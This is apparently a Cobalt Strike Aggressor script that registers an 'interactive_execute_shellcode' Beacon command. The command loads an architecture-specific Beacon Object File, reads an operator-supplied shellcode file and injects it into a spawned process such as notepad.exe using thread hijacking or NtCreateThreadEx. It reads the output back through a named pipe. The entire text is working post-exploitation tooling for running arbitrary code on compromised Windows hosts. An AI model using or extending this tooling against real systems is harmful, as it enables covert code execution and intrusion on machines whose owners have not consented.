beacon_command_register(
   "interactive_execute_shellcode",
   "Interactive shellcode injection - Using 3 injection technique, spawning a process, allocate memory and create a namepipe to read stdout to out process.",

   "Usage:\n" .
   "   interactive_execute_shellcode [options]\n\n" .

   "Options (specified in any order):\n" .
   "   --process <process>            - specify a process to use for the BOF\n" .
   "   --technique <technique>        - specify which technique to use in the BOF\n" .
   "   --shellcode <shellcode file>   - specify the shellcode file to use\n\n" .

   "Examples:\n" .
   "   interactive_execute_shellcode --process notepad.exe --technique NtCreateThreadEx --shellcode shellcode.bin\n"
);

alias interactive_execute_shellcode {
   local('$bid @valid_opts %opts $opt_cnt $opt_ind $opt $value $barch $handle $data $args');

   %opts["--process"] = "notepad";
   %opts["--technique"] = "ThreadHijacking";
   %opts["--shellcode"] = "";

   $bid = @_[0];
   $opt_cnt = size(@_);
   @valid_opts = @("--process", "--technique", "--shellcode");
   for($opt_ind = 1; $opt_ind < $opt_cnt; $opt_ind++) {
      $opt = @_[$opt_ind];
      $opt_ind++;
      $value = iff( $opt_ind >= $opt_cnt, $null, @_[$opt_ind] );

      if ($opt !in @valid_opts) {
         berror($bid, "$opt is not a valid option.");
         return;
      }
      if ($value is $null || $value in @valid_opts) {
         berror($bid, "Missing or invalid value for the $opt option.");
         return;
      }

      %opts[$opt] = $value;
   }

    $barch  = barch($bid);
    $handle = openf(script_resource("interactive_execute_shellcode. $+ $barch $+ .o"));
    $data   = readb($handle, -1);
    closef($handle);

    $sc_handle = openf(%opts["--shellcode"]);
    $sc_data = readb($sc_handle, -1);
    closef($sc_handle);

    $targetProcess = %opts["--process"];
    $targetTechnique = %opts["--technique"]; 

   $args = bof_pack($1, "bbb", $targetTechnique, $targetProcess, $sc_data);

    btask($bid, "Running interactive_execute_shellcode BOF using process: " . $targetProcess . ", technique: " . $targetTechnique. ", and shellcode: " . %opts["--shellcode"]);

    beacon_inline_execute($bid, $data, "go", $args);
}
